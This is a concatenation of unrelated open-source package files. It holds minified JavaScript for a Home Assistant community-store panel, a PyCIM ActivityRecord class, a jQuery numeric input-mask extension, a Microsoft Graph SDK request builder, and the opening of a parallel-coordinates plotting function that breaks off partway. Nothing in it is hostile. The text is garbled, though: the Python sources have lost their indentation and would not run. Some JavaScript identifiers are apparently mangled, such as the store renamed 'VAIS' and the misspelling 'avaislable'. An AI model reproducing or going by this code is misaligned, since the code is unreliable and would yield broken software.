.icon-background ha-svg-icon {
color: #fff;
}
`}}]}}),h),c([g("ha-config-section")],(function(t,e){return{F:class extends e{constructor(...e){super(...e),t(this)}},d:[{kind:"field",decorators:[p()],key:"isWide",value:()=>!1},{kind:"field",decorators:[p({type:Boolean})],key:"vertical",value:()=>!1},{kind:"field",decorators:[p({type:Boolean,attribute:"full-width"})],key:"fullWidth",value:()=>!1},{kind:"method",key:"render",value:function(){return u`
<div
class="content ${v({narrow:!this.isWide,"full-width":this.fullWidth})}"
>
<div class="header"><slot name="header"></slot></div>
<div
class="together layout ${v({narrow:!this.isWide,vertical:this.vertical||!this.isWide,horizontal:!this.vertical&&this.isWide})}"
>
<div class="intro"><slot name="introduction"></slot></div>
<div class="panel flex-auto"><slot></slot></div>
</div>
</div>
`}},{kind:"get",static:!0,key:"styles",value:function(){return f`
:host {
display: block;
}
.content {
padding: 28px 20px 0;
max-width: 1040px;
margin: 0 auto;
}
.layout {
display: flex;
}
.horizontal {
flex-direction: row;
}
.vertical {
flex-direction: column;
}
.flex-auto {
flex: 1 1 auto;
}
.header {
font-family: var(--paper-font-headline_-_font-family);
-webkit-font-smoothing: var(
--paper-font-headline_-_-webkit-font-smoothing
);
font-size: var(--paper-font-headline_-_font-size);
font-weight: var(--paper-font-headline_-_font-weight);
letter-spacing: var(--paper-font-headline_-_letter-spacing);
line-height: var(--paper-font-headline_-_line-height);
opacity: var(--dark-primary-opacity);
}
.together {
margin-top: 32px;
}
.intro {
font-family: var(--paper-font-subhead_-_font-family);
-webkit-font-smoothing: var(
--paper-font-subhead_-_-webkit-font-smoothing
);
font-weight: var(--paper-font-subhead_-_font-weight);
line-height: var(--paper-font-subhead_-_line-height);
width: 100%;
opacity: var(--dark-primary-opacity);
font-size: 14px;
padding-bottom: 20px;
}
.horizontal .intro {
max-width: 400px;
margin-right: 40px;
}
.panel {
margin-top: -24px;
}
.panel ::slotted(*) {
margin-top: 24px;
display: block;
}
.narrow.content {
max-width: 640px;
}
.narrow .together {
margin-top: 20px;
}
.narrow .intro {
padding-bottom: 20px;
margin-right: 0;
max-width: 500px;
}
.full-width {
padding: 0;
}
.full-width .layout {
flex-direction: column;
}
`}}]}}),h);const j=y(((t,e)=>{var i,o,s;const n=[],a=[],r=[];var l,d;return t.repositories.forEach((e=>{var i;if("pending-restart"===e.status&&r.push(e),t.addedToLovelace(t,e)||a.push(e),e.installed&&null!==(i=t.removed.map((t=>t.repository)))&&void 0!==i&&i.includes(e.full_name)){const i=t.removed.find((t=>t.repository===e.full_name));n.push({name:t.localize("entry.messages.removed_repository",{repository:i.repository}),info:i.reason,severity:"warning",dialog:"remove",repository:e})}})),null!==(i=t.status)&&void 0!==i&&i.startup&&["setup","waiting","startup"].includes(t.status.stage)&&n.push({name:t.localize(`entry.messages.${t.status.stage}.title`),info:t.localize(`entry.messages.${t.status.stage}.content`),severity:"warning"}),null!==(o=t.status)&&void 0!==o&&o.has_pending_tasks&&n.push({name:t.localize("entry.messages.has_pending_tasks.title"),info:t.localize("entry.messages.has_pending_tasks.content"),severity:"warning"}),null!==(s=t.status)&&void 0!==s&&s.disabled?[{name:t.localize("entry.messages.disabled.title"),secondary:t.localize(`entry.messages.disabled.${null===(l=t.status)||void 0===l?void 0:l.disabled_reason}.title`),info:t.localize(`entry.messages.disabled.${null===(d=t.status)||void 0===d?void 0:d.disabled_reason}.description`),severity:"error"}]:(a.length>0&&n.push({name:t.localize("entry.messages.resources.title"),info:t.localize("entry.messages.resources.content",{number:a.length}),severity:"error"}),r.length>0&&n.push({name:t.localize("entry.messages.restart.title"),path:e?"/_my_redirect/server_controls":void 0,info:t.localize("entry.messages.restart.content",{number:r.length,pluralWording:1===r.length?t.localize("common.integration"):t.localize("common.integration_plural")}),severity:"error"}),n)}));let U=c([g("vais-entry-panel")],(function(t,e){return{F:class extends e{constructor(...e){super(...e),t(this)}},d:[{kind:"field",decorators:[p({attribute:!1})],key:"vais",value:void 0},{kind:"field",decorators:[p({attribute:!1})],key:"hass",value:void 0},{kind:"field",decorators:[p({attribute:!1})],key:"route",value:void 0},{kind:"field",decorators:[p({type:Boolean,reflect:!0})],key:"narrow",value:void 0},{kind:"field",decorators:[p({type:Boolean})],key:"isWide",value:void 0},{kind:"method",key:"render",value:function(){var t,e;const i=[],o=[],s=j(this.vais,S(this.hass,"my"));return this.vais.repositories.forEach((t=>{t.pending_upgrade&&i.push(t)})),s.forEach((t=>{o.push({iconPath:m,name:t.name,info:t.info,secondary:t.secondary,path:t.path||"",severity:t.severity,dialog:t.dialog,repository:t.repository})})),this.dispatchEvent(new CustomEvent("update-vais",{detail:{messages:o,updates:i},bubbles:!0,composed:!0})),u`
<ha-app-layout>
<app-header fixed slot="header">
<app-toolbar>
<ha-menu-button .hass=${this.hass} .narrow=${this.narrow}></ha-menu-button>
<div main-title>${this.narrow?"VAIS":"Home Assistant Community Store"}</div>
</app-toolbar>
</app-header>
<ha-config-section .narrow=${this.narrow} .isWide=${this.isWide} full-width>
${0!==(null===(t=this.vais.messages)||void 0===t?void 0:t.length)?this.vais.messages.map((t=>u`
<ha-alert
.alertType=${t.severity}
.title=${t.secondary?`${t.name} - ${t.secondary}`:t.name}
.rtl=${R(this.hass)}
>
${t.info}
<mwc-button
slot="action"
.label=${t.path?this.vais.localize("common.navigate"):t.dialog?this.vais.localize("common.show"):""}
@click=${()=>t.path?_(t.path):this._openDialog(t)}
>
</mwc-button>
</ha-alert>
`)):(this.narrow,"")}
${0!==(null===(e=this.vais.updates)||void 0===e?void 0:e.length)?u` <ha-card outlined>
<div class="title">${this.vais.localize("common.updates")}</div>
${b(this.vais.updates).map((t=>u`
<div class="list-item" @click=${()=>this._openUpdateDialog(t)}>
<div class="list-item-icon">
${"integration"===t.category?u`
<img
loading="lazy"
.src=${$({domain:t.domain,darkOptimized:this.hass.themes.darkMode,type:"icon"})}
referrerpolicy="no-referrer"
@error=${this._onImageError}
@load=${this._onImageLoad}
/>
`:u`
<ha-svg-icon
path="${w}"
style="padding-left: 0; height: 40px; width: 40px;"
>
</ha-svg-icon>
`}
</div>
<div class="list-item-content">
<div class="list-item-header">${t.name}</div>
<div class="list-item-description">
${this.vais.localize("sections.pending_repository_upgrade",{downloaded:t.installed_version,avaislable:t.avaislable_version})}
</div>
</div>
${this.narrow?"":u`<ha-icon-next></ha-icon-next>`}
</div>
`))}
</ha-card>`:""}
<ha-card outlined>
<ha-config-navigation
.hass=${this.hass}
.pages=${this.vais.sections}
.narrow=${this.narrow}
>
</ha-config-navigation>
${S(this.hass,"hassio")?u`
<div class="list-item" @click=${this._openSupervisorDialog}>
<div class="list-item-icon">
<div class="icon-background" style="background-color: rgb(64, 132, 205)">
<ha-svg-icon .path=${k}></ha-svg-icon>
</div>
</div>
<div class="list-item-content">
<div class="list-item-header">
${this.vais.localize("sections.addon.title")}
</div>
<div class="list-item-description">
${this.vais.localize("sections.addon.description")}
</div>
</div>
</div>
`:""}
<div class="list-item" @click=${this._openAboutDialog}>
<div class="list-item-icon">
<div class="icon-background" style="background-color: rgb(74, 89, 99)">
<ha-svg-icon .path=${x}></ha-svg-icon>
</div>
</div>
<div class="list-item-content">
<div class="list-item-header">${this.vais.localize("sections.about.title")}</div>
<div class="list-item-description">
${this.vais.localize("sections.about.description")}
</div>
</div>
</div>
</ha-card>
</ha-config-section>
</ha-app-layout>
`}},{kind:"method",key:"_onImageLoad",value:function(t){t.target.style.visibility="initial"}},{kind:"method",key:"_onImageError",value:function(t){t.target&&(t.target.outerHTML=`\n <div slot="item-icon" class="icon-background">\n <ha-svg-icon path="${w}" style="padding-left: 0; height: 40px; width: 40px;"></ha-svg-icon>\n </div>`)}},{kind:"method",key:"_openDialog",value:function(t){t.dialog&&("remove"==t.dialog&&(t.dialog="removed"),this.dispatchEvent(new CustomEvent("vais-dialog",{detail:{type:t.dialog,repository:t.repository},bubbles:!0,composed:!0})))}},{kind:"method",key:"_openUpdateDialog",value:function(t){this.dispatchEvent(new CustomEvent("vais-dialog",{detail:{type:"update",repository:t.id},bubbles:!0,composed:!0}))}},{kind:"method",key:"_openAboutDialog",value:async function(){L(this,this.vais)}},{kind:"method",key:"_openSupervisorDialog",value:async function(){this.dispatchEvent(new CustomEvent("vais-dialog",{detail:{type:"navigate",path:"/hassio"},bubbles:!0,composed:!0}))}},{kind:"get",static:!0,key:"styles",value:function(){return[z,T,f`
:host(:not([narrow])) ha-card:last-child {
margin-bottom: 24px;
}
ha-config-section {
margin: -16px auto auto;
max-width: 600px;
color: var(--secondary-text-color);
}
ha-card {
overflow: hidden;
}
ha-card a {
text-decoration: none;
color: var(--primary-text-color);
}
.title {
font-size: 16px;
padding: 16px;
padding-bottom: 0;
}
:host([narrow]) ha-card {
border-radius: 0;
box-shadow: unset;
}
:host([narrow]) ha-config-section {
margin-top: -42px;
}
.icon-background {
border-radius: 50%;
}
.icon-background ha-svg-icon {
color: #fff;
}
.title {
font-size: 16px;
padding: 16px;
padding-bottom: 0;
}
ha-svg-icon,
ha-icon-next {
color: var(--secondary-text-color);
height: 24px;
width: 24px;
}
ha-svg-icon {
padding: 8px;
}
.list-item-icon > * {
height: 40px;
width: 40px;
padding: 0;
}
img {
border-radius: 50%;
}
.list-item {
width: 100%;
cursor: pointer;
display: flex;
padding: 16px;
}
.list-item-icon {
margin-right: 16px;
}
.list-item-header {
font-size: 16px;
}
.list-item-description {
color: var(--secondary-text-color);
margin-right: 16px;
}
.list-item ha-icon-next,
.list-item ha-svg-icon[right] {
right: 0;
padding: 16px;
position: absolute;
}
`]}}]}}),h);export{U as VaisEntryPanel}; | PypiClean |
/PyCIM-15.15.0.tar.gz/PyCIM-15.15.0/CIM15/IEC61968/Common/ActivityRecord.py |
from CIM15.IEC61970.Core.IdentifiedObject import IdentifiedObject
class ActivityRecord(IdentifiedObject):
"""Records activity for an entity at a point in time; activity may be for an event that has already occurred or for a planned activity.Records activity for an entity at a point in time; activity may be for an event that has already occurred or for a planned activity.
"""
def __init__(self, severity='', createdDateTime='', reason='', category='', ErpPersons=None, Organisations=None, Documents=None, Assets=None, status=None, ScheduledEvent=None, *args, **kw_args):
"""Initialises a new 'ActivityRecord' instance.
@param severity: Severity level of event resulting in this activity record.
@param createdDateTime: Date and time this activity record has been created (different from the 'status.dateTime', which is the time of a status change of the associated object, if applicable).
@param reason: Reason for event resulting in this activity record, typically supplied when user initiated.
@param category: Category of event resulting in this activity record.
@param ErpPersons:
@param Organisations:
@param Documents: All documents for which this activity record has been created.
@param Assets: All assets for which this activity record has been created.
@param status: Information on consequence of event resulting in this activity record.
@param ScheduledEvent:
"""
#: Severity level of event resulting in this activity record.
self.severity = severity
#: Date and time this activity record has been created (different from the 'status.dateTime', which is the time of a status change of the associated object, if applicable).
self.createdDateTime = createdDateTime
#: Reason for event resulting in this activity record, typically supplied when user initiated.
self.reason = reason
#: Category of event resulting in this activity record.
self.category = category
self._ErpPersons = []
self.ErpPersons = [] if ErpPersons is None else ErpPersons
self._Organisations = []
self.Organisations = [] if Organisations is None else Organisations
self._Documents = []
self.Documents = [] if Documents is None else Documents
self._Assets = []
self.Assets = [] if Assets is None else Assets
self.status = status
self._ScheduledEvent = None
self.ScheduledEvent = ScheduledEvent
super(ActivityRecord, self).__init__(*args, **kw_args)
_attrs = ["severity", "createdDateTime", "reason", "category"]
_attr_types = {"severity": str, "createdDateTime": str, "reason": str, "category": str}
_defaults = {"severity": '', "createdDateTime": '', "reason": '', "category": ''}
_enums = {}
_refs = ["ErpPersons", "Organisations", "Documents", "Assets", "status", "ScheduledEvent"]
_many_refs = ["ErpPersons", "Organisations", "Documents", "Assets"]
def getErpPersons(self):
return self._ErpPersons
def setErpPersons(self, value):
for p in self._ErpPersons:
filtered = [q for q in p.ActivityRecords if q != self]
            p._ActivityRecords = filtered
for r in value:
if self not in r._ActivityRecords:
r._ActivityRecords.append(self)
self._ErpPersons = value
ErpPersons = property(getErpPersons, setErpPersons)
def addErpPersons(self, *ErpPersons):
for obj in ErpPersons:
if self not in obj._ActivityRecords:
obj._ActivityRecords.append(self)
self._ErpPersons.append(obj)
def removeErpPersons(self, *ErpPersons):
for obj in ErpPersons:
if self in obj._ActivityRecords:
obj._ActivityRecords.remove(self)
self._ErpPersons.remove(obj)
def getOrganisations(self):
return self._Organisations
def setOrganisations(self, value):
for p in self._Organisations:
filtered = [q for q in p.ActivityRecords if q != self]
            p._ActivityRecords = filtered
for r in value:
if self not in r._ActivityRecords:
r._ActivityRecords.append(self)
self._Organisations = value
Organisations = property(getOrganisations, setOrganisations)
def addOrganisations(self, *Organisations):
for obj in Organisations:
if self not in obj._ActivityRecords:
obj._ActivityRecords.append(self)
self._Organisations.append(obj)
def removeOrganisations(self, *Organisations):
for obj in Organisations:
if self in obj._ActivityRecords:
obj._ActivityRecords.remove(self)
self._Organisations.remove(obj)
def getDocuments(self):
"""All documents for which this activity record has been created.
"""
return self._Documents
def setDocuments(self, value):
for p in self._Documents:
filtered = [q for q in p.ActivityRecords if q != self]
            p._ActivityRecords = filtered
for r in value:
if self not in r._ActivityRecords:
r._ActivityRecords.append(self)
self._Documents = value
Documents = property(getDocuments, setDocuments)
def addDocuments(self, *Documents):
for obj in Documents:
if self not in obj._ActivityRecords:
obj._ActivityRecords.append(self)
self._Documents.append(obj)
def removeDocuments(self, *Documents):
for obj in Documents:
if self in obj._ActivityRecords:
obj._ActivityRecords.remove(self)
self._Documents.remove(obj)
def getAssets(self):
"""All assets for which this activity record has been created.
"""
return self._Assets
def setAssets(self, value):
for p in self._Assets:
filtered = [q for q in p.ActivityRecords if q != self]
            p._ActivityRecords = filtered
for r in value:
if self not in r._ActivityRecords:
r._ActivityRecords.append(self)
self._Assets = value
Assets = property(getAssets, setAssets)
def addAssets(self, *Assets):
for obj in Assets:
if self not in obj._ActivityRecords:
obj._ActivityRecords.append(self)
self._Assets.append(obj)
def removeAssets(self, *Assets):
for obj in Assets:
if self in obj._ActivityRecords:
obj._ActivityRecords.remove(self)
self._Assets.remove(obj)
# Information on consequence of event resulting in this activity record.
status = None
def getScheduledEvent(self):
return self._ScheduledEvent
def setScheduledEvent(self, value):
if self._ScheduledEvent is not None:
self._ScheduledEvent._ActivityRecord = None
self._ScheduledEvent = value
if self._ScheduledEvent is not None:
self._ScheduledEvent.ActivityRecord = None
self._ScheduledEvent._ActivityRecord = self
ScheduledEvent = property(getScheduledEvent, setScheduledEvent) | PypiClean |
/nobinobi-child-0.1.4.14.tar.gz/nobinobi-child-0.1.4.14/nobinobi_child/static/vendor/adminLTE/plugins/input-mask/jquery.inputmask.numeric.extensions.js | (function ($) {
//number aliases
$.extend($.inputmask.defaults.aliases, {
'decimal': {
mask: "~",
placeholder: "",
repeat: "*",
greedy: false,
numericInput: false,
isNumeric: true,
digits: "*", //number of fractionalDigits
groupSeparator: "",//",", // | "."
radixPoint: ".",
groupSize: 3,
autoGroup: false,
allowPlus: true,
allowMinus: true,
//todo
integerDigits: "*", //number of integerDigits
defaultValue: "",
prefix: "",
suffix: "",
//todo
getMaskLength: function (buffer, greedy, repeat, currentBuffer, opts) { //custom getMaskLength to take the groupSeparator into account
var calculatedLength = buffer.length;
if (!greedy) {
if (repeat == "*") {
calculatedLength = currentBuffer.length + 1;
} else if (repeat > 1) {
calculatedLength += (buffer.length * (repeat - 1));
}
}
var escapedGroupSeparator = $.inputmask.escapeRegex.call(this, opts.groupSeparator);
var escapedRadixPoint = $.inputmask.escapeRegex.call(this, opts.radixPoint);
var currentBufferStr = currentBuffer.join(''), strippedBufferStr = currentBufferStr.replace(new RegExp(escapedGroupSeparator, "g"), "").replace(new RegExp(escapedRadixPoint), ""),
groupOffset = currentBufferStr.length - strippedBufferStr.length;
return calculatedLength + groupOffset;
},
postFormat: function (buffer, pos, reformatOnly, opts) {
if (opts.groupSeparator == "") return pos;
var cbuf = buffer.slice(),
radixPos = $.inArray(opts.radixPoint, buffer);
if (!reformatOnly) {
cbuf.splice(pos, 0, "?"); //set position indicator
}
var bufVal = cbuf.join('');
if (opts.autoGroup || (reformatOnly && bufVal.indexOf(opts.groupSeparator) != -1)) {
var escapedGroupSeparator = $.inputmask.escapeRegex.call(this, opts.groupSeparator);
bufVal = bufVal.replace(new RegExp(escapedGroupSeparator, "g"), '');
var radixSplit = bufVal.split(opts.radixPoint);
bufVal = radixSplit[0];
var reg = new RegExp('([-\+]?[\\d\?]+)([\\d\?]{' + opts.groupSize + '})');
while (reg.test(bufVal)) {
bufVal = bufVal.replace(reg, '$1' + opts.groupSeparator + '$2');
bufVal = bufVal.replace(opts.groupSeparator + opts.groupSeparator, opts.groupSeparator);
}
if (radixSplit.length > 1)
bufVal += opts.radixPoint + radixSplit[1];
}
buffer.length = bufVal.length; //align the length
for (var i = 0, l = bufVal.length; i < l; i++) {
buffer[i] = bufVal.charAt(i);
}
var newPos = $.inArray("?", buffer);
if (!reformatOnly) buffer.splice(newPos, 1);
return reformatOnly ? pos : newPos;
},
regex: {
number: function (opts) {
var escapedGroupSeparator = $.inputmask.escapeRegex.call(this, opts.groupSeparator);
var escapedRadixPoint = $.inputmask.escapeRegex.call(this, opts.radixPoint);
var digitExpression = isNaN(opts.digits) ? opts.digits : '{0,' + opts.digits + '}';
var signedExpression = opts.allowPlus || opts.allowMinus ? "[" + (opts.allowPlus ? "\+" : "") + (opts.allowMinus ? "-" : "") + "]?" : "";
return new RegExp("^" + signedExpression + "(\\d+|\\d{1," + opts.groupSize + "}((" + escapedGroupSeparator + "\\d{" + opts.groupSize + "})?)+)(" + escapedRadixPoint + "\\d" + digitExpression + ")?$");
}
},
onKeyDown: function (e, buffer, opts) {
var $input = $(this), input = this;
if (e.keyCode == opts.keyCode.TAB) {
var radixPosition = $.inArray(opts.radixPoint, buffer);
if (radixPosition != -1) {
var masksets = $input.data('_inputmask')['masksets'];
var activeMasksetIndex = $input.data('_inputmask')['activeMasksetIndex'];
for (var i = 1; i <= opts.digits && i < opts.getMaskLength(masksets[activeMasksetIndex]["_buffer"], masksets[activeMasksetIndex]["greedy"], masksets[activeMasksetIndex]["repeat"], buffer, opts) ; i++) {
if (buffer[radixPosition + i] == undefined || buffer[radixPosition + i] == "") buffer[radixPosition + i] = "0";
}
input._valueSet(buffer.join(''));
}
} else if (e.keyCode == opts.keyCode.DELETE || e.keyCode == opts.keyCode.BACKSPACE) {
opts.postFormat(buffer, 0, true, opts);
input._valueSet(buffer.join(''));
return true;
}
},
definitions: {
'~': { //real number
validator: function (chrs, buffer, pos, strict, opts) {
if (chrs == "") return false;
if (!strict && pos <= 1 && buffer[0] === '0' && new RegExp("[\\d-]").test(chrs) && buffer.join('').length == 1) { //handle first char
buffer[0] = "";
return { "pos": 0 };
}
var cbuf = strict ? buffer.slice(0, pos) : buffer.slice();
cbuf.splice(pos, 0, chrs);
var bufferStr = cbuf.join('');
//strip groupseparator
var escapedGroupSeparator = $.inputmask.escapeRegex.call(this, opts.groupSeparator);
bufferStr = bufferStr.replace(new RegExp(escapedGroupSeparator, "g"), '');
var isValid = opts.regex.number(opts).test(bufferStr);
if (!isValid) {
//let's help the regex a bit
bufferStr += "0";
isValid = opts.regex.number(opts).test(bufferStr);
if (!isValid) {
//make a valid group
var lastGroupSeparator = bufferStr.lastIndexOf(opts.groupSeparator);
for (var i = bufferStr.length - lastGroupSeparator; i <= 3; i++) {
bufferStr += "0";
}
isValid = opts.regex.number(opts).test(bufferStr);
if (!isValid && !strict) {
if (chrs == opts.radixPoint) {
isValid = opts.regex.number(opts).test("0" + bufferStr + "0");
if (isValid) {
buffer[pos] = "0";
pos++;
return { "pos": pos };
}
}
}
}
}
if (isValid != false && !strict && chrs != opts.radixPoint) {
var newPos = opts.postFormat(buffer, pos, false, opts);
return { "pos": newPos };
}
return isValid;
},
cardinality: 1,
prevalidator: null
}
},
insertMode: true,
autoUnmask: false
},
'integer': {
regex: {
number: function (opts) {
var escapedGroupSeparator = $.inputmask.escapeRegex.call(this, opts.groupSeparator);
var signedExpression = opts.allowPlus || opts.allowMinus ? "[" + (opts.allowPlus ? "\+" : "") + (opts.allowMinus ? "-" : "") + "]?" : "";
return new RegExp("^" + signedExpression + "(\\d+|\\d{1," + opts.groupSize + "}((" + escapedGroupSeparator + "\\d{" + opts.groupSize + "})?)+)$");
}
},
alias: "decimal"
}
});
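    // A hypothetical usage sketch for the aliases defined above; the element
    // ids and option values are illustrative only, not part of this plugin:
    //   $("#amount").inputmask("decimal", {
    //       digits: 2, groupSeparator: ",", radixPoint: ".", autoGroup: true
    //   });
    //   $("#quantity").inputmask("integer", { allowMinus: false });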
})(jQuery); | PypiClean |
/keywords-0.0.1.zip/keywords-0.0.1/keywords.py | import re
from nltk import RegexpParser, pos_tag
class KeyWords(object):
def __init__(self, corpus=None, stop_words=[], alpha=0.5):
if alpha < 0.0 or alpha > 1.0:
raise ValueError("Alpha should be between 0-1")
self.stop_words = stop_words
stop_word_regex_list = []
for word in self.stop_words:
word_regex = r'\b' + word + r'(?![\w-])'
stop_word_regex_list.append(word_regex)
self.stop_word_pattern = re.compile('|'.join(stop_word_regex_list), re.IGNORECASE)
self.corpus = corpus
self.alpha = alpha
self.parser = RegexpParser('''
KEYWORDS: {<DT>? <JJ>* <NN.*>+}
P: {<IN>}
V: {<V.*>}
PHRASES: {<P> <KEYWORDS>}
ACTIONS: {<V> <KEYWORDS|PHRASES>*}
''')
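        # For example, a tagged span like [('the', 'DT'), ('neural', 'JJ'),
        # ('network', 'NN')] matches the KEYWORDS rule above (optional
        # determiner, any adjectives, one or more nouns) and is chunked as a
        # single keyword phrase; PHRASES and ACTIONS build on such chunks.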
def is_number(self, s):
try:
float(s) if '.' in s else int(s)
return True
except ValueError:
return False
def _sentence_tokenize(self, text):
sentence_split = re.compile(u'[.!?,;:\t\\\\"\\(\\)\\\'\u2019\u2013\n]|\\s\\-\\s')
sentences = sentence_split.split(text)
return sentences
def _phrase_tokenize(self, sentences):
phrase_list = []
for s in sentences:
tmp = re.sub(self.stop_word_pattern, '|', s.strip())
phrases = tmp.split("|")
for phrase in phrases:
phrase = phrase.strip().lower()
if phrase != "":
phrase_list.append(phrase)
phrase_list_new = []
for p in phrase_list:
tags = pos_tag(self._word_tokenize(p))
if tags != []:
chunks = self.parser.parse(tags)
for subtree in chunks.subtrees(filter=lambda t: t.label() == 'KEYWORDS'):
keyword = ' '.join([i[0] for i in subtree])
phrase_list_new.append(keyword)
return phrase_list_new
def _word_tokenize(self, text):
splitter = re.compile('[^a-zA-Z0-9_\\+\\-/]')
words = []
for single_word in splitter.split(text):
current_word = single_word.strip().lower()
if current_word != '' and not self.is_number(current_word):
words.append(current_word)
return words
@property
def _corpus_keywords(self):
if self.corpus:
sents = self._sentence_tokenize(self.corpus)
return self._phrase_tokenize(sents)
else:
return None
def compute_word_scores(self, phraseList):
word_frequency = {}
word_degree = {}
for phrase in phraseList:
word_list = self._word_tokenize(phrase)
word_list_length = len(word_list)
word_list_degree = word_list_length - 1
for word in word_list:
word_frequency.setdefault(word, 0)
word_frequency[word] += 1
word_degree.setdefault(word, 0)
word_degree[word] += word_list_degree
for item in word_frequency:
word_degree[item] = word_degree[item] + word_frequency[item]
word_score = {}
for item in word_frequency:
word_score.setdefault(item, 0)
word_score[item] = word_degree[item] / (word_frequency[item] * 1.0)
return word_score
@property
def _corpus_keyword_scores(self):
corp_keywords = self._corpus_keywords
if corp_keywords:
word_scores = self.compute_word_scores(corp_keywords)
keyword_candidates = {}
for phrase in corp_keywords:
keyword_candidates.setdefault(phrase, 0)
word_list = self._word_tokenize(phrase)
candidate_score = 0
for word in word_list:
candidate_score += word_scores[word]
keyword_candidates[phrase] = candidate_score
return keyword_candidates
else:
return None
    def phrase_scoring(self, phrase_list, word_score):
corp_scores = self._corpus_keyword_scores
keyword_candidates = {}
for phrase in phrase_list:
keyword_candidates.setdefault(phrase, 0)
word_list = self._word_tokenize(phrase)
candidate_score = 0
for word in word_list:
candidate_score += word_score[word]
if corp_scores:
keyword_candidates[phrase] = (1-self.alpha)*candidate_score + (self.alpha)*(corp_scores[phrase] if phrase in corp_scores else 0.0)
else:
keyword_candidates[phrase] = candidate_score
return keyword_candidates
def get_keywords(self, text, n=20):
sentence_list = self._sentence_tokenize(text)
phrase_list = self._phrase_tokenize(sentence_list)
word_scores = self.compute_word_scores(phrase_list)
        keyword_candidates = self.phrase_scoring(phrase_list, word_scores)
return sorted(keyword_candidates.items(), key=lambda x: x[1], reverse=True)[:n] | PypiClean |
/msgraph_beta_sdk-1.0.0a9-py3-none-any.whl/msgraph/generated/groups/item/sites/item/term_store/sets/item/parent_group/sets/item/children/item/relations/item/to_term/to_term_request_builder.py | from __future__ import annotations
from dataclasses import dataclass
from kiota_abstractions.get_path_parameters import get_path_parameters
from kiota_abstractions.method import Method
from kiota_abstractions.request_adapter import RequestAdapter
from kiota_abstractions.request_information import RequestInformation
from kiota_abstractions.request_option import RequestOption
from kiota_abstractions.response_handler import ResponseHandler
from kiota_abstractions.serialization import Parsable, ParsableFactory
from typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union
if TYPE_CHECKING:
from ................models.o_data_errors import o_data_error
from ................models.term_store import term
class ToTermRequestBuilder():
"""
Provides operations to manage the toTerm property of the microsoft.graph.termStore.relation entity.
"""
def __init__(self,request_adapter: RequestAdapter, path_parameters: Optional[Union[Dict[str, Any], str]] = None) -> None:
"""
Instantiates a new ToTermRequestBuilder and sets the default values.
Args:
pathParameters: The raw url or the Url template parameters for the request.
requestAdapter: The request adapter to use to execute the requests.
"""
if path_parameters is None:
raise Exception("path_parameters cannot be undefined")
if request_adapter is None:
raise Exception("request_adapter cannot be undefined")
# Url template to use to build the URL for the current request builder
self.url_template: str = "{+baseurl}/groups/{group%2Did}/sites/{site%2Did}/termStore/sets/{set%2Did}/parentGroup/sets/{set%2Did1}/children/{term%2Did}/relations/{relation%2Did}/toTerm{?%24select,%24expand}"
url_tpl_params = get_path_parameters(path_parameters)
self.path_parameters = url_tpl_params
self.request_adapter = request_adapter
async def get(self,request_configuration: Optional[ToTermRequestBuilderGetRequestConfiguration] = None) -> Optional[term.Term]:
"""
The to [term] of the relation. The term to which the relationship is defined.
Args:
requestConfiguration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: Optional[term.Term]
"""
request_info = self.to_get_request_information(
request_configuration
)
from ................models.o_data_errors import o_data_error
error_mapping: Dict[str, ParsableFactory] = {
"4XX": o_data_error.ODataError,
"5XX": o_data_error.ODataError,
}
if not self.request_adapter:
raise Exception("Http core is null")
from ................models.term_store import term
return await self.request_adapter.send_async(request_info, term.Term, error_mapping)
def to_get_request_information(self,request_configuration: Optional[ToTermRequestBuilderGetRequestConfiguration] = None) -> RequestInformation:
"""
The to [term] of the relation. The term to which the relationship is defined.
Args:
requestConfiguration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: RequestInformation
"""
request_info = RequestInformation()
request_info.url_template = self.url_template
request_info.path_parameters = self.path_parameters
request_info.http_method = Method.GET
request_info.headers["Accept"] = ["application/json"]
if request_configuration:
request_info.add_request_headers(request_configuration.headers)
request_info.set_query_string_parameters_from_raw_object(request_configuration.query_parameters)
request_info.add_request_options(request_configuration.options)
return request_info
@dataclass
class ToTermRequestBuilderGetQueryParameters():
"""
The to [term] of the relation. The term to which the relationship is defined.
"""
def get_query_parameter(self,original_name: Optional[str] = None) -> str:
"""
Maps the query parameters names to their encoded names for the URI template parsing.
Args:
originalName: The original query parameter name in the class.
Returns: str
"""
if original_name is None:
raise Exception("original_name cannot be undefined")
if original_name == "expand":
return "%24expand"
if original_name == "select":
return "%24select"
return original_name
# Expand related entities
expand: Optional[List[str]] = None
# Select properties to be returned
select: Optional[List[str]] = None
@dataclass
class ToTermRequestBuilderGetRequestConfiguration():
"""
Configuration for the request such as headers, query parameters, and middleware options.
"""
# Request headers
headers: Optional[Dict[str, Union[str, List[str]]]] = None
# Request options
options: Optional[List[RequestOption]] = None
# Request query parameters
query_parameters: Optional[ToTermRequestBuilder.ToTermRequestBuilderGetQueryParameters] = None | PypiClean |
/views_dataviz-0.10.0.tar.gz/views_dataviz-0.10.0/views_dataviz/pcoord.py |
from typing import List, Dict, Tuple
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
def plot_parallel_coordinates(
df: pd.DataFrame,
columns: List[str],
linecolors: Dict[str, str] = None,
linestyles: Dict[str, str] = None,
reverse: List[str] = None,
figsize: Tuple[float, float] = (10.0, 5.0),
labelsize: float = 12.0,
titlesize: float = 16.0,
legend_anchor: Tuple[float, float] = (1.2, 1.0),
lw: float = 2.0,
path: str = None,
):
"""Generates a parallel coordinates plot.
Parameters
----------
df: pd.DataFrame containing the scores to plot, indexed on the subject
(models for example).
    columns: List of column names for the metrics to plot.
linecolors: Dictionary of index: color pairs to overwrite. Colors
default to tab10. For example: {"model_a": "green", "model_b": "red"}.
    linestyles: Dictionary of index: style pairs to overwrite. Styles
default to "solid". For example: {"model_a": "solid", "model_b": "dotted"}.
    reverse: Optional list of column names to reverse to a descending scale.
figsize: Tuple of figure size in inches.
labelsize: Textsize of figure labels.
titlesize: Textsize of figure title.
legend_anchor: Tuple of legend location on x and y in axes coordinates.
lw: Float for the width of all plotted lines.
path: Optional string path. Writes figure to path if set.
"""
values = df[columns].values
ymins, ymaxs = values.min(axis=0), values.max(axis=0)
# Optional reverse applied to columns.
if reverse is not None:
for col in reverse:
index = columns.index(col)
ymaxs[index], ymins[index] = ymins[index], ymaxs[index]
# Add some padding to the ranges, and recompute deltas.
deltas = ymaxs - ymins
ymins -= deltas * 0.1
ymaxs += deltas * 0.1
deltas = ymaxs - ymins
# Prepare the figure array.
zvalues = np.zeros_like(values)
zvalues[:, 0] = values[:, 0]
# Transform all data beyond the first column using broadcasting to be
